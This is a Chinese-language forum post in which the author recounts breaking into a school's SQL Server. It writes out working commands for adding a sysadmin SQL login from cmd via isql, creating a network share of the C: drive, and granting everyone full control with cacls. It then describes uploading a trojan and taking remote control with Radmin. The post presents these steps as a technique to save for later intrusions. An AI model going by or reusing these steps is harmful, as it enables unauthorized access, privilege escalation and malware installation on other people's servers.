CMD下加sql帳號：駭客入侵新手法

仲介交易 HTTP://www.aliyun.com/zixun/aggregation/6858.html">SEO診斷 淘寶客 雲主機 技術大廳

有的伺服器可以用sql溢出，可惜就是找不到進一步的入侵方法，因而一直也沒有拿下來。 今天在校盟看到一篇文章，說是在cmd下也可以中入sql帳號和密碼，方法如下：

echo exec master.dbo.sp_addlogin 'rooto','******' >test.qry

echo exec sp_addsrvrolemember 'rooto','sysadmin' >>test.qry

cmd.exe /c isql -E /U alma /P /i c:\test.qry

看完後立馬去試了一下，居然真的成功了，可是由於溢出，伺服器的sql服務已經停止，只好等它下次啟動時再運行了。 不過對我來說，這種加sql帳號的方法還是第一次，所以得拿出來記一下，以備以後還有能用得著的時候，呵呵。

關於後面的也就不說了，大體上都是以前的老方法了，雖然我現在還沒有進一步，但估計已在我手中了。

上次寫到哪兒就沒寫了，這次還是想寫點東西的。

上次說入侵這個還挺簡單，可是我在後來的入侵過程中，發現並不是那麼簡單，加了sql帳號，以後可以有系統許可權了，沒想到進去一看， 發現刪了xplog70.dll和cmdshell，下面如果再入侵就難多了，到邪八發帖，居然沒通過，一直發不出來，到火狐去發帖，幾天都沒有回，看來還是得自己搞定了。

這樣一直過了幾天，後來我在我的硬碟裡找啊找，發現了一個nocmdshell執得命令的工具，一看是幻影的人寫的，刺還的隊伍還真不錯，寫的工具也牛B。 打開工具試了下，發現真的成功了，可以加帳號和執行命令，不過我試了tftp和echo都不行，看來還是有一些問題。 雖然可以執行命令了，但還不能將我的木馬傳上去，這跟我以前的SQL溢出的許可權還是一樣的，還丟了ehco命令，以前還可以echo的，到底如何是好呢，問了幾個朋友，都沒有得到我想要的答案。

後來習慣的輸入"net share"看了一下，嚇死，看到了IPC$，這個我以前很少玩過，沒想到今天遇到了，立馬到網上找了相關的IPC$入侵資料。 照著資料弄，可是還是不行，原來主機上就只有一個ipc$共用和一個cdbook_tem的共用，於是加了在cmd下加了一個共用"net share rooto=c:\"，然後在IPC$裡輸入copy update.exe \\*** **\rooto，響響的按下了回車，帶著微笑的...

下面讓我看到的一幕真讓我傷心：「拒絕訪問... 已複掉0個檔"，暈死哦，不是加了共用了嗎，還不讓我上傳，真BT。 於是轉到D盤，看到一個temp檔是空的，於是將它設為共用，並設入everyone共用，誰知又出錯，沒有許可權，沒想到管理員這麼強啊，這還真讓我感到有挑戰性了。 不信就搞不定你，於是我又來到E盤，看到一個Bak的資料夾，進去一看，發現是空的，這個應該有寫許可權吧，將它設為共用，再copy，可還是

不行，將為共用吧，命令如下：

cacls d:\website /g everyone:f /e /t 授予此所有使用者對該目錄的完全控制許可權

cacls d:\website /r everyone /e /t 取消其它使用者對此目錄的存取權限

我是沒想著可以成功的，可誰知成功了，後來一陣狂喜。 呵呵。

機不可失，失不再來，立馬上傳了木馬文件，運行了一下，看到Radmin可以連接了，我心想，這才算是成功了啊。 呵呵。

後來用Radmin連接它的盤時發現D盤是一個光碟，汗死，光碟也長期掛在電腦上，真是服了學校這幫玩意們。 我還以為真是它BT呢，原來是這樣啊。

這個伺服器的入侵就到此結束了，近期也在與學校一位老師Q聊著，關於學校SQL溢出的嚴重漏洞已不可小視了，我已將補丁位址發給他們了，希望他們能及時打上補丁。

轉載請注明出自：HTTP://bbs.qq318.com